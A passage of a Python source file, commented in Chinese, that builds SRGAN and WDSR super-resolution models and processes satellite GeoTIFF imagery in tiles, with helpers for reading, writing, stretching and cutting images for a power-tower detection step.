ShortcutBlock(sequential(*resnet_blocks, LR_conv)),\\\r\n *upsampler, HR_conv0, HR_conv1)\r\n\r\n def forward(self, x):\r\n# noise = torch.randn(x.shape[1:4], device='cuda')\r\n x = addnoise_cn(x, self.use_gpu)\r\n x = self.model(x)\r\n return x\r\n'''WDSR'''\r\nclass WDSRNet(nn.Module):\r\n def __init__(self, in_nc, out_nc, nf, nb, upscale=4, norm_type='weight', act_type='relu', \\\r\n mode='CAN', res_scale=1, upsample_mode='pixelshuffle'):\r\n super(WDSRNet, self).__init__()\r\n wn = lambda x: torch.nn.utils.weight_norm(x)\r\n head=[]\r\n body=[]\r\n tail=[]\r\n skip=[]\r\n head.append(\r\n wn(nn.Conv2d(in_nc, nf//2, 3, padding=3//2)))\r\n for _ in range(nb):\r\n body.append(ResNetBlock_wn(nf//2, nf*3, nf//2, norm_type=norm_type, act_type=act_type,\\\r\n mode=mode, res_scale=res_scale))\r\n out_feats = upscale*upscale*out_nc\r\n tail.append(\r\n wn(conv_block(nf//2, out_feats, kernel_size=3, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=norm_type, act_type=None))\r\n )\r\n tail.append(nn.PixelShuffle(upscale))\r\n skip.append(\r\n wn(conv_block(in_nc, out_feats, kernel_size=5, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=norm_type, act_type=None))\r\n )\r\n skip.append(nn.PixelShuffle(upscale))\r\n self.head = nn.Sequential(*head)\r\n self.body = nn.Sequential(*body)\r\n self.tail = nn.Sequential(*tail)\r\n self.skip = nn.Sequential(*skip)\r\n\r\n def forward(self, x):\r\n s=self.skip(x)\r\n x=self.head(x)\r\n x=self.body(x)\r\n x=self.tail(x)\r\n x += s\r\n return x\r\n\r\n\r\n'''定义基础超分框架'''\r\nclass BaseModel():\r\n def __init__(self, load_path, modeltype, use_gpu):\r\n self.use_gpu=use_gpu\r\n if self.use_gpu:\r\n self.device = torch.device('cuda')\r\n else:\r\n self.device = torch.device('cpu')\r\n# self.is_train = opt['is_train']\r\n# self.device = torch.device('cpu')\r\n self.schedulers = []\r\n self.optimizers = []\r\n 
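# checkpoint path; subclasses (e.g. Model_Builder.load below) read it to restore weights\r\n        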
self.load_path=load_path\r\n\r\n def feed_data(self, data):\r\n pass\r\n\r\n def optimize_parameters(self):\r\n pass\r\n\r\n def get_current_visuals(self):\r\n pass\r\n\r\n def get_current_losses(self):\r\n pass\r\n\r\n def print_network(self):\r\n pass\r\n\r\n def save(self, label):\r\n pass\r\n\r\n def load(self):\r\n pass\r\n\r\n def update_learning_rate(self):\r\n for scheduler in self.schedulers:\r\n scheduler.step()\r\n\r\n def get_current_learning_rate(self):\r\n return self.schedulers[0].get_lr()[0]\r\n\r\n def get_network_description(self, network):\r\n '''Get the string and total parameters of the network'''\r\n if isinstance(network, nn.DataParallel):\r\n network = network.module\r\n s = str(network)\r\n n = sum(map(lambda x: x.numel(), network.parameters()))\r\n return s, n\r\n\r\n def save_network(self, network, network_label, iter_step):\r\n save_filename = '{}_{}.pth'.format(iter_step, network_label)\r\n save_path = os.path.join(self.opt['path']['models'], save_filename)\r\n if isinstance(network, nn.DataParallel):\r\n network = network.module\r\n state_dict = network.state_dict()\r\n for key, param in state_dict.items():\r\n state_dict[key] = param.cpu()\r\n torch.save(state_dict, save_path)\r\n\r\n def load_network(self, load_path, network, strict=True):\r\n if isinstance(network, nn.DataParallel):\r\n network = network.module\r\n network.load_state_dict(torch.load(load_path), strict=strict)\r\n\r\n def save_training_state(self, epoch, iter_step):\r\n '''Saves training state during training, which will be used for resuming'''\r\n state = {'epoch': epoch, 'iter': iter_step, 'schedulers': [], 'optimizers': []}\r\n for s in self.schedulers:\r\n state['schedulers'].append(s.state_dict())\r\n for o in self.optimizers:\r\n state['optimizers'].append(o.state_dict())\r\n save_filename = '{}.state'.format(iter_step)\r\n save_path = os.path.join(self.opt['path']['training_state'], save_filename)\r\n torch.save(state, save_path)\r\n\r\n def resume_training(self, resume_state):\r\n '''Resume the optimizers and schedulers for training'''\r\n resume_optimizers = resume_state['optimizers']\r\n resume_schedulers = resume_state['schedulers']\r\n assert len(resume_optimizers) == len(self.optimizers), 'Wrong lengths of optimizers'\r\n assert len(resume_schedulers) == len(self.schedulers), 'Wrong lengths of schedulers'\r\n for i, o in enumerate(resume_optimizers):\r\n self.optimizers[i].load_state_dict(o)\r\n for i, s in enumerate(resume_schedulers):\r\n self.schedulers[i].load_state_dict(s)\r\n'''定义超分模型'''\r\nlogger = logging.getLogger('base')\r\nclass Model_Builder(BaseModel):\r\n '''构建网络模型加载框架'''\r\n def __init__(self, load_path, modeltype, use_gpu):\r\n super(Model_Builder, self).__init__(load_path, modeltype, use_gpu)\r\n # define network and load pretrained models\r\n if modeltype=='WDSR':\r\n self.netG = WDSRNet(in_nc=4, out_nc=4, nf=64, nb=23, upscale=4, norm_type='weight', act_type='relu', mode='CNA', upsample_mode='pixelshuffle')\r\n elif modeltype=='SRGAN':\r\n self.netG = SRResNet(in_nc=4, out_nc=4, nf=64, nb=16, upscale=4, norm_type=None, act_type='relu', mode= 'CNA', upsample_mode='pixelshuffle')\r\n elif modeltype=='SRGAN_Noise':\r\n self.netG = SRResNet_Noise(in_nc=4, out_nc=4, nf=64, nb=16, upscale=4, norm_type= None, act_type='relu', mode='CNA', upsample_mode='pixelshuffle', use_gpu=self.use_gpu)\r\n else:\r\n raise NotImplementedError('Model [{:s}] not recognized.'.format(modeltype))\r\n self.netG=self.netG.to(self.device)\r\n self.load()\r\n self.print_network()\r\n\r\n 
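# inference helpers: feed_data() moves an LR tensor to the device, test() runs the generator on it\r\n    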
def feed_data(self, data, need_HR=False):\r\n self.var_L = data.to(self.device) # LR\r\n if need_HR:\r\n self.real_H = data['HR'].to(self.device) # HR\r\n\r\n def optimize_parameters(self, step):\r\n self.optimizer_G.zero_grad()\r\n self.fake_H = self.netG(self.var_L)\r\n l_pix = self.l_pix_w * self.cri_pix(self.fake_H, self.real_H)\r\n l_pix.backward()\r\n self.optimizer_G.step()\r\n\r\n # set log\r\n self.log_dict['l_pix'] = l_pix.item()\r\n\r\n def test(self):\r\n self.netG.eval()\r\n with torch.no_grad():\r\n self.fake_H = self.netG(self.var_L)\r\n self.netG.train()\r\n\r\n def test_x8(self):\r\n # from https://github.com/thstkdgus35/EDSR-PyTorch\r\n self.netG.eval()\r\n for k, v in self.netG.named_parameters():\r\n v.requires_grad = False\r\n\r\n def _transform(v, op):\r\n # if self.precision != 'single': v = v.float()\r\n v2np = v.data.cpu().numpy()\r\n if op == 'v':\r\n tfnp = v2np[:, :, :, ::-1].copy()\r\n elif op == 'h':\r\n tfnp = v2np[:, :, ::-1, :].copy()\r\n elif op == 't':\r\n tfnp = v2np.transpose((0, 1, 3, 2)).copy()\r\n\r\n ret = torch.Tensor(tfnp).to(self.device)\r\n # if self.precision == 'half': ret = ret.half()\r\n\r\n return ret\r\n\r\n lr_list = [self.var_L]\r\n for tf in 'v', 'h', 't':\r\n lr_list.extend([_transform(t, tf) for t in lr_list])\r\n sr_list = [self.netG(aug) for aug in lr_list]\r\n for i in range(len(sr_list)):\r\n if i > 3:\r\n sr_list[i] = _transform(sr_list[i], 't')\r\n if i % 4 > 1:\r\n sr_list[i] = _transform(sr_list[i], 'h')\r\n if (i % 4) % 2 == 1:\r\n sr_list[i] = _transform(sr_list[i], 'v')\r\n\r\n output_cat = torch.cat(sr_list, dim=0)\r\n self.fake_H = output_cat.mean(dim=0, keepdim=True)\r\n\r\n for k, v in self.netG.named_parameters():\r\n v.requires_grad = True\r\n self.netG.train()\r\n\r\n def get_current_log(self):\r\n return self.log_dict\r\n\r\n def get_current_visuals(self, need_HR=False):\r\n out_dict = OrderedDict()\r\n out_dict['LR'] = self.var_L.detach()[0].float().cpu()\r\n out_dict['SR'] = self.fake_H.detach()[0].float().cpu()\r\n if need_HR:\r\n out_dict['HR'] = self.real_H.detach()[0].float().cpu()\r\n return out_dict\r\n\r\n def print_network(self):\r\n s, n = self.get_network_description(self.netG)\r\n if isinstance(self.netG, nn.DataParallel):\r\n net_struc_str = '{} - {}'.format(self.netG.__class__.__name__,\r\n self.netG.module.__class__.__name__)\r\n else:\r\n net_struc_str = '{}'.format(self.netG.__class__.__name__)\r\n\r\n logger.info('Network G structure: {}, with parameters: {:,d}'.format(net_struc_str, n))\r\n logger.info(s)\r\n\r\n def load(self):\r\n load_path_G = self.load_path\r\n if load_path_G is not None:\r\n self.load_network(load_path_G, self.netG)\r\n\r\n def save(self, iter_step):\r\n self.save_network(self.netG, 'G', iter_step)\r\n\r\n'''读取卫星影像函数'''\r\ndef read_img(filename):\r\n '''读取带坐标的Tif文件'''\r\n dataset=gdal.Open(filename) #打开文件\r\n\r\n im_width = dataset.RasterXSize #栅格矩阵的列数\r\n im_height = dataset.RasterYSize #栅格矩阵的行数\r\n\r\n im_geotrans = list(dataset.GetGeoTransform()) #仿射矩阵\r\n im_proj = dataset.GetProjection() #地图投影信息\r\n im_data = dataset.ReadAsArray(0,0,im_width,im_height) #将数据写成数组,对应栅格矩阵\r\n\r\n del dataset #清理内存\r\n return im_proj,im_geotrans,im_data\r\n\r\n'''存储卫星影像函数'''\r\ndef write_img(filename,im_proj,im_geotrans,im_data):\r\n '''保存tif文件'''\r\n if 'int8' in im_data.dtype.name:\r\n datatype = gdal.GDT_Byte\r\n elif 'int16' in im_data.dtype.name:\r\n datatype = gdal.GDT_UInt16\r\n else:\r\n datatype = gdal.GDT_Float32\r\n\r\n #判读数组维数\r\n if len(im_data.shape) == 3:\r\n im_bands, 
im_height, im_width = im_data.shape\r\n else:\r\n im_bands, (im_height, im_width) = 1,im_data.shape\r\n\r\n #创建文件\r\n driver = gdal.GetDriverByName(\"GTiff\") #数据类型必须有,因为要计算需要多大内存空间\r\n dataset = driver.Create(filename, im_width, im_height, im_bands, datatype)\r\n\r\n dataset.SetGeoTransform(im_geotrans) #写入仿射变换参数\r\n dataset.SetProjection(im_proj) #写入投影\r\n\r\n if im_bands == 1:\r\n dataset.GetRasterBand(1).WriteArray(im_data) #写入数组数据\r\n else:\r\n for i in range(im_bands):\r\n dataset.GetRasterBand(i+1).WriteArray(im_data[i])\r\n\r\n del dataset\r\n\r\n'''tensor转遥感影像函数'''\r\ndef tensor2rsimg(tensor, out_type=np.uint8, min_max=(0, 1)):\r\n '''\r\n Converts a torch Tensor into an image Numpy array\r\n Input: 4D(B,(3/1),H,W), 3D(C,H,W), or 2D(H,W), any range, RGB channel order\r\n Output: 3D(H,W,C) or 2D(H,W), [0,255], np.uint8 (default)\r\n '''\r\n tensor = tensor.squeeze().float().cpu().clamp_(*min_max) # clamp\r\n tensor = (tensor - min_max[0]) / (min_max[1] - min_max[0]) # to range [0,1]\r\n n_dim = tensor.dim()\r\n if n_dim == 4:\r\n n_img = len(tensor)\r\n img_np = make_grid(tensor, nrow=int(math.sqrt(n_img)), normalize=False).numpy()\r\n elif n_dim == 3:\r\n img_np = tensor.numpy()\r\n elif n_dim == 2:\r\n img_np = tensor.numpy()\r\n else:\r\n raise TypeError(\r\n 'Only support 4D, 3D and 2D tensor. But received with dimension: {:d}'.format(n_dim))\r\n if out_type == np.uint8:\r\n img_np = (img_np * 255.0).round()\r\n # Important. Unlike matlab, numpy.unit8() WILL NOT round by default.\r\n return img_np.astype(out_type)\r\n\r\n'''影像拉伸函数'''\r\ndef imgstretch(img):\r\n gray=img\r\n d2=np.percentile( gray,2 )\r\n #d2=np.min(gray)\r\n u98=np.percentile( gray,98 )\r\n #u98=np.max(gray)\r\n maxout=255\r\n minout=0\r\n gray_new=minout + ( (gray-d2) / (u98-d2) ) * (maxout - minout)\r\n gray_new[gray_new < minout]=minout\r\n gray_new[gray_new > maxout]=maxout\r\n gray_out=Image.fromarray(gray_new.astype(np.uint8))\r\n return gray_out\r\n\r\n'''清空缓存文件夹'''\r\ndef del_file(filepath):\r\n \"\"\"\r\n 删除某一目录下的所有文件或文件夹\r\n :param filepath: 路径\r\n :return:\r\n \"\"\"\r\n del_list = os.listdir(filepath)\r\n for f in del_list:\r\n file_path = os.path.join(filepath, f)\r\n if os.path.isfile(file_path):\r\n os.remove(file_path)\r\n elif os.path.isdir(file_path):\r\n shutil.rmtree(file_path)\r\n\r\n'''进度条函数'''\r\n# def process_bar(percent, start_str='', end_str='', total_length=0):\r\n# bar = ''.join([\"\\033[31m%s\\033[0m\"%' '] * int(percent * total_length)) + ''\r\n# bar = '\\r' + start_str + bar.ljust(total_length) + ' {:0>4.1f}%|'.format(percent*100) + end_str\r\n# print(bar, end='', flush=True)\r\ndef process_bar(percent, start_str='', end_str='', total_length=0):\r\n a='*'* int(100 * percent)\r\n b='.'* (100 - int(100 * percent))\r\n c=int(100 * percent)\r\n print(\"{:^3.0f}%[{}->{}]\".format(c, a, b))\r\n time.sleep(0.1)\r\n\r\n'''直接超分辨率函数'''\r\ndef SuperResolution(im_data, ModType, SaveForDetect=True, SateType='SV1', use_gpu = True):\r\n '''\r\n 超分辨率函数\r\n '''\r\n ################################################\r\n im_data = im_data.astype(np.float32)/255.\r\n im_data = np.expand_dims(im_data, axis=0)\r\n im_data = torch.tensor(im_data)\r\n ################################################读取tif文件并转为tensor格式\r\n LoadPath = './models/SRmodels/'+SateType+'/'+ModType+'.pth'\r\n model = Model_Builder(LoadPath, ModType, use_gpu)\r\n #print('Model created')\r\n ################################################创建超分辨率模型\r\n m ,n = im_data.shape[2], im_data.shape[3]\r\n m1 = math.ceil(m/600)\r\n n1 = 
math.ceil(n/600)\r\n b = torch.zeros(1,4,m1*600,n1*600)\r\n b[:,:,0:m,0:n]=im_data\r\n del im_data\r\n b_SR = np.zeros((4,m1*2400,n1*2400), dtype=np.uint8)\r\n count=100000\r\n for i in range(0, m1):\r\n for j in range (0, n1):\r\n #影像超分辨率\r\n count=count+1\r\n if torch.sum(b[:,:,i*600:i*600+600,j*600:j*600+600],(1,2,3))>0:\r\n model.feed_data(b[:,:,i*600:i*600+600,j*600:j*600+600])\r\n model.test()\r\n visuals = model.get_current_visuals(need_HR=False)\r\n sr_img = tensor2rsimg(visuals['SR'])\r\n b_SR[:,i*2400:i*2400+2400,j*2400:j*2400+2400]=sr_img\r\n del b\r\n if SaveForDetect:\r\n # 判断是否采用伪彩色融合\r\n b_SR1=np.zeros((3,m*4,n*4), dtype=np.uint8)\r\n # b_SR1[0,:,:]=b_SR[2,:m*4,:n*4]\r\n # b_SR1[1,:,:]=b_SR[3,:m*4,:n*4]\r\n # b_SR1[2,:,:]=b_SR[0,:m*4,:n*4]\r\n #\r\n b_SR1[0,:,:]=b_SR[2,:m*4,:n*4]\r\n b_SR1[1,:,:]=b_SR[3,:m*4,:n*4]\r\n b_SR1[2,:,:]=b_SR[0,:m*4,:n*4]\r\n else:\r\n b_SR1=np.zeros((4,m*4,n*4), dtype=np.uint8)\r\n b_SR1[0,:,:]=b_SR[0,:m*4,:n*4]\r\n b_SR1[1,:,:]=b_SR[1,:m*4,:n*4]\r\n b_SR1[2,:,:]=b_SR[2,:m*4,:n*4]\r\n b_SR1[3,:,:]=b_SR[3,:m*4,:n*4]\r\n del b_SR\r\n return b_SR1\r\n\r\n'''超分辨率总体函数'''\r\ndef DoSR(InPath, ModType, OutPath, Stretch, SaveForDetect, SateType, DoWhole, use_gpu):\r\n im_proj, im_geotrans, data = read_img(InPath)\r\n step = 0\r\n end_str = '100%'\r\n # 判断是否需要灰度拉伸,若是则执行\r\n if Stretch=='True':\r\n print(\"灰度拉伸中\")\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[0, :, :] = imgstretch(data[0, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[1, :, :] = imgstretch(data[1, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[2, :, :] = imgstretch(data[2, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n data[3, :, :] = imgstretch(data[3, :, :])\r\n step = step + 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n print(\"灰度拉伸完成\")\r\n step = 0\r\n # 执行超分辨率部分\r\n if DoWhole=='True':\r\n # 首先判断是否针对整景影像进行超分,若是则执行过程如下\r\n m, n = data.shape[1], data.shape[2]\r\n m1 = math.ceil(m / 1200)\r\n n1 = math.ceil(n / 1200)\r\n b = np.zeros((4, 1200 * m1, 1200 * n1), dtype=np.uint8)\r\n b[:, 0:m, 0:n] = data\r\n del data\r\n # 影像边长补齐为1200的整数倍\r\n count = 100000\r\n if SaveForDetect=='True':\r\n # 判断是否使用假彩色\r\n print(\"影像超分辨率缓存中\")\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR = np.zeros((3, 4800, 4800), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n # 执行超分辨率并缓存\r\n b_SR = SuperResolution(b[:, i * 1200:i * 1200 + 1200, j * 1200:j * 1200 + 1200],\r\n ModType, SaveForDetect, SateType, use_gpu)\r\n geotrans = np.array(im_geotrans)\r\n xoffset2 = j * 1200\r\n yoffset2 = i * 1200\r\n px = geotrans[0] + xoffset2 * geotrans[1] + yoffset2 * geotrans[2]\r\n py = geotrans[3] + xoffset2 * geotrans[4] + yoffset2 * geotrans[5]\r\n geotrans[0] = px\r\n geotrans[3] = py\r\n geotrans[1] /= 4\r\n geotrans[5] /= 4\r\n if geotrans[5] > 0:\r\n geotrans[5] = -geotrans[5]\r\n geotrans = geotrans.tolist()\r\n i1 = count + i\r\n j1 = count + j\r\n progress += 1\r\n write_img('./cache/' + str(i1) + str(j1) + '.tif', im_proj, geotrans, b_SR)\r\n step = 100*progress/(m1*n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b\r\n del b_SR\r\n print(\"缓存完成\")\r\n # 超分辨率结果拼接\r\n step = 0\r\n print(\"超分辨率结果拼接中\")\r\n output = np.zeros((3, 4 * m, 4 
* n), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n if i == m1 - 1:\r\n mi = 4 * m\r\n else:\r\n mi = i * 4800 + 4800\r\n if j == n1 - 1:\r\n nj = 4 * n\r\n else:\r\n nj = j * 4800 + 4800\r\n im_proj2, im_geotrans2, im_data = read_img(\r\n './cache/' + str(count + i) + str(count + j) + '.tif')\r\n output[:, i * 4800:mi, j * 4800:nj] = im_data[:, :mi - i * 4800, :nj - j * 4800]\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n # 超分辨率结果存储\r\n print(\"拼接完成\")\r\n step = 0\r\n print(\"超分辨率影像存储中\")\r\n geotrans2 = np.array(im_geotrans)\r\n geotrans2[1] /= 4\r\n geotrans2[5] /= 4\r\n if geotrans2[5] > 0:\r\n geotrans2[5] = -geotrans2[5]\r\n write_img(OutPath, im_proj, geotrans2.tolist(), output)\r\n del output\r\n print(\"存储完成\")\r\n else:\r\n # 不采用假彩色合成的超分辨率过程\r\n print(\"影像超分辨率缓存中\")\r\n b_SR = np.zeros((4, 4800, 4800), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n b_SR = SuperResolution(b[:, i * 1200:i * 1200 + 1200, j * 1200:j * 1200 + 1200],\r\n ModType, SaveForDetect, SateType, use_gpu)\r\n geotrans = np.array(im_geotrans)\r\n xoffset2 = j * 1200\r\n yoffset2 = i * 1200\r\n px = geotrans[0] + xoffset2 * geotrans[1] + yoffset2 * geotrans[2]\r\n py = geotrans[3] + xoffset2 * geotrans[4] + yoffset2 * geotrans[5]\r\n geotrans[0] = px\r\n geotrans[3] = py\r\n geotrans[1] /= 4\r\n geotrans[5] /= 4\r\n if geotrans[5] > 0:\r\n geotrans[5] = -geotrans[5]\r\n geotrans = geotrans.tolist()\r\n i1 = count + i\r\n j1 = count + j\r\n write_img('./cache/' + str(i1) + str(j1) + '.tif', im_proj, geotrans, b_SR)\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b\r\n del b_SR\r\n print(\"缓存完成\")\r\n step = 0\r\n print(\"超分辨率结果拼接中\")\r\n output = np.zeros((4, 4 * m, 4 * n), dtype=np.uint8)\r\n progress = 0\r\n for i in range(0, m1):\r\n for j in range(0, n1):\r\n if i == m1 - 1:\r\n mi = 4 * m\r\n else:\r\n mi = i * 4800 + 4800\r\n if j == n1 - 1:\r\n nj = 4 * n\r\n else:\r\n nj = j * 4800 + 4800\r\n im_proj2, im_geotrans2, im_data = read_img(\r\n './cache/' + str(count + i) + str(count + j) + '.tif')\r\n output[:, i * 4800:mi, j * 4800:nj] = im_data[:, :mi - i * 4800, :nj - j * 4800]\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n print(\"拼接完成\")\r\n print(\"超分辨率影像存储中\")\r\n geotrans2 = np.array(im_geotrans)\r\n geotrans2[1] /= 4\r\n geotrans2[5] /= 4\r\n if geotrans2[5] > 0:\r\n geotrans2[5] = -geotrans2[5]\r\n write_img(OutPath, im_proj, geotrans2.tolist(), output)\r\n del output\r\n print(\"存储完成\")\r\n del_file('./cache/')\r\n else:\r\n # 针对裁剪后影像的超分辨率过程(省略缓存步骤)\r\n print(\"影像超分辨率中\")\r\n data = data.astype(np.float32) / 255.\r\n data = np.expand_dims(data, axis=0)\r\n data = torch.tensor(data)\r\n ####################################################图片转为tensor格式\r\n LoadPath = './models/SRmodels/' + SateType + '/' + ModType + '.pth'\r\n model = Model_Builder(LoadPath, ModType, use_gpu)\r\n ####################################################创建超分辨率模型\r\n m, n = data.shape[2], data.shape[3]\r\n m1 = math.ceil(m / 600)\r\n n1 = math.ceil(n / 600)\r\n b = torch.zeros(1, 4, m1 * 600, n1 * 600)\r\n b[:, :, 0:m, 0:n] = data\r\n del data\r\n b_SR = np.zeros((4, m1 * 2400, n1 * 2400), dtype=np.uint8)\r\n count = 100000\r\n progress = 0\r\n for i in range(0, m1):\r\n 
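# process the scene tile by tile: each 1200x1200 LR tile is super-resolved (x4) to a 4800x4800 tile\r\n                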
for j in range(0, n1):\r\n count = count + 1\r\n if torch.sum(b[:, :, i * 600:i * 600 + 600, j * 600:j * 600 + 600], (1, 2, 3)) > 0:\r\n model.feed_data(b[:, :, i * 600:i * 600 + 600, j * 600:j * 600 + 600])\r\n model.test()\r\n visuals = model.get_current_visuals(need_HR=False)\r\n sr_img = tensor2rsimg(visuals['SR'])\r\n b_SR[:, i * 2400:i * 2400 + 2400, j * 2400:j * 2400 + 2400] = sr_img\r\n progress += 1\r\n step = 100 * progress / (m1 * n1)\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b\r\n #####################################################影像超分辨率\r\n print(\"超分辨率完成\")\r\n step = 0\r\n print(\"影像拼接中\")\r\n if SaveForDetect=='True':\r\n b_SR1 = np.zeros((3, m * 4, n * 4), dtype=np.uint8)\r\n b_SR1[0, :, :] = b_SR[2, :m * 4, :n * 4]\r\n step += 1\r\n process_bar(step / 3, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[1, :, :] = b_SR[3, :m * 4, :n * 4]\r\n step += 1\r\n process_bar(step / 3, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[2, :, :] = b_SR[0, :m * 4, :n * 4]\r\n step += 1\r\n process_bar(step / 3, start_str='', end_str=end_str, total_length=15)\r\n else:\r\n b_SR1 = np.zeros((4, m * 4, n * 4), dtype=np.uint8)\r\n b_SR1[0, :, :] = b_SR[0, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[1, :, :] = b_SR[1, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[2, :, :] = b_SR[2, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n b_SR1[3, :, :] = b_SR[3, :m * 4, :n * 4]\r\n step += 25\r\n process_bar(step / 100, start_str='', end_str=end_str, total_length=15)\r\n del b_SR\r\n print(\"拼接完成\")\r\n print(\"超分辨率影像存储中\")\r\n geotrans2 = np.array(im_geotrans)\r\n geotrans2[1] /= 4\r\n geotrans2[5] /= 4\r\n if geotrans2[5] > 0:\r\n geotrans2[5] = -geotrans2[5]\r\n write_img(OutPath, im_proj, geotrans2.tolist(), b_SR1)\r\n del b_SR1\r\n print(\"存储完成\")\r\n\r\n'''定义杆塔识别模块'''\r\ndef read_img_dt(filename):\r\n '''读取带坐标的Tif文件'''\r\n dataset = gdal.Open(filename) #打开文件\r\n\r\n im_width = dataset.RasterXSize #栅格矩阵的列数\r\n im_height = dataset.RasterYSize #栅格矩阵的行数\r\n\r\n im_geotrans = list(dataset.GetGeoTransform()) #仿射矩阵\r\n im_proj = dataset.GetProjection() #地图投影信息\r\n im_data = dataset.ReadAsArray(0,0,im_width,im_height) #将数据写成数组,对应栅格矩阵\r\n\r\n del dataset #清理内存\r\n return im_data\r\n\r\ndef write_img_dt(filename, im_data):\r\n '''保存tif文件'''\r\n if 'int8' in im_data.dtype.name:\r\n datatype = gdal.GDT_Byte\r\n elif 'int16' in im_data.dtype.name:\r\n datatype = gdal.GDT_UInt16\r\n else:\r\n datatype = gdal.GDT_Float32\r\n\r\n #判读数组维数\r\n if len(im_data.shape) == 3:\r\n im_bands, im_height, im_width = im_data.shape\r\n else:\r\n im_bands, (im_height, im_width) = 1,im_data.shape\r\n\r\n #创建文件\r\n driver = gdal.GetDriverByName(\"GTiff\") #数据类型必须有,因为要计算需要多大内存空间\r\n dataset = driver.Create(filename, im_width, im_height, im_bands, datatype)\r\n\r\n #dataset.SetGeoTransform(im_geotrans) #写入仿射变换参数\r\n #dataset.SetProjection(im_proj) #写入投影\r\n\r\n if im_bands == 1:\r\n dataset.GetRasterBand(1).WriteArray(im_data) #写入数组数据\r\n else:\r\n for i in range(im_bands):\r\n dataset.GetRasterBand(i+1).WriteArray(im_data[i])\r\n\r\n del dataset\r\n\r\ndef get_file_names(data_dir, file_type=['tif', 'tiff']):\r\n '''裁剪及合并过程中读取影像文件名'''\r\n result_dir = []\r\n result_name = []\r\n for maindir, subdir, file_name_list in os.walk(data_dir):\r\n for filename in 
file_name_list:\r\n apath = maindir + '/' + filename\r\n ext = apath.split('.')[-1]\r\n if ext in file_type:\r\n result_dir.append(apath)\r\n result_name.append(filename)\r\n else:\r\n pass\r\n return result_dir, result_name\r\n\r\n\r\ndef get_same_img(img_dir, img_name):\r\n result = {}\r\n for idx, name in enumerate(img_name):\r\n temp_name = ''\r\n for idx2, item in enumerate(name.split('_')[:-4]):\r\n if idx2 == 0:\r\n temp_name = temp_name + item\r\n else:\r\n temp_name = temp_name + '_' + item\r\n\r\n if temp_name in result:\r\n result[temp_name].append(img_dir[idx])\r\n else:\r\n result[temp_name] = []\r\n result[temp_name].append(img_dir[idx])\r\n return result\r\n\r\n\r\ndef assign_spatial_reference_byfile(src_path, dst_path):\r\n '''\r\n 融合坐标信息\r\n :param src_path: 原始整景影像路径\r\n dst_path:需要融合坐标信息的影像路径\r\n :return: None\r\n '''\r\n src_ds = gdal.Open(src_path, gdal.GA_ReadOnly)\r\n sr = osr.SpatialReference()\r\n sr.ImportFromWkt(src_ds.GetProjectionRef())\r\n geoTransform = src_ds.GetGeoTransform()\r\n dst_ds = gdal.Open(dst_path, gdal.GA_Update)\r\n dst_ds.SetProjection(sr.ExportToWkt())\r\n dst_ds.SetGeoTransform(geoTransform)\r\n #print(geoTransform)\r\n dst_ds = None\r\n src_ds = None\r\n\r\ndef assign_spatial_reference_byfile_coordinate(src_path):\r\n '''\r\n 获取坐标信息\r\n :param src_path: 原始整景影像路径\r\n :return: 坐标信息\r\n '''\r\n src_ds = gdal.Open(src_path, gdal.GA_ReadOnly)\r\n sr = osr.SpatialReference()\r\n sr.ImportFromWkt(src_ds.GetProjectionRef())\r\n geoTransform = src_ds.GetGeoTransform()\r\n return geoTransform\r\n\r\n\r\ndef cut(in_dir, out_dir, file_type=['tif', 'tiff'], out_type='tif', out_size=1024):\r\n '''\r\n 裁剪整景影像\r\n :param in_dir: 原始整景影像\r\n out_dir:裁剪后存放的文件夹路径\r\n out_size: 这里默认为1024\r\n :return: None\r\n '''\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n data_dir_list, _ = get_file_names(in_dir, file_type)\r\n count = 0\r\n print('Cut begining for ', str(len(data_dir_list)), ' images.....')\r\n for each_dir in data_dir_list:\r\n time_start = time.time()\r\n # image = np.array(io.imread(each_dir))\r\n #image = np.array(Image.open(each_dir))\r\n image = np.array(read_img_dt(each_dir))\r\n image = np.transpose(image, (1,2,0))\r\n #影像整体分割、分割因素是cut_factor_row x cut_factor_clo\r\n cut_factor_row = int(np.ceil(image.shape[0] / out_size))\r\n cut_factor_clo = int(np.ceil(image.shape[1] / out_size))\r\n for i in range(cut_factor_row):\r\n for j in range(cut_factor_clo):\r\n\r\n if i == cut_factor_row - 1:\r\n i = image.shape[0] / out_size - 1\r\n else:\r\n pass\r\n\r\n if j == cut_factor_clo - 1:\r\n j = image.shape[1] / out_size - 1\r\n else:\r\n pass\r\n\r\n start_x = int(np.rint(i * out_size))\r\n start_y = int(np.rint(j * out_size))\r\n end_x = int(np.rint((i + 1) * out_size))\r\n end_y = int(np.rint((j + 1) * out_size))\r\n\r\n temp_image = image[start_x:end_x, start_y:end_y, :]\r\n\r\n out_dir_images = out_dir + 